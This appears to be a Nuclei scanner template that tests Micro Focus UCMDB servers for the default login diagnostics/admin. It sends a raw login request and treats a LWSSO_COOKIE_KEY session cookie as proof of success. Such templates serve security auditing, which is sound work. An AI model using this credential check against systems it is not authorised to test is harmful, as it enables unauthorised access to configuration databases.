id: ucmdb-default-login

info:
  name: Micro Focus UCMDB Default Login
  author: dwisiswant0
  severity: high
  tags: ucmdb,default-login

requests:
  - raw:
      - |
        POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
        Host: {{Hostname}}

        customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB

    attack: pitchfork
    payloads:
      username:
        - diagnostics
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "LWSSO_COOKIE_KEY"
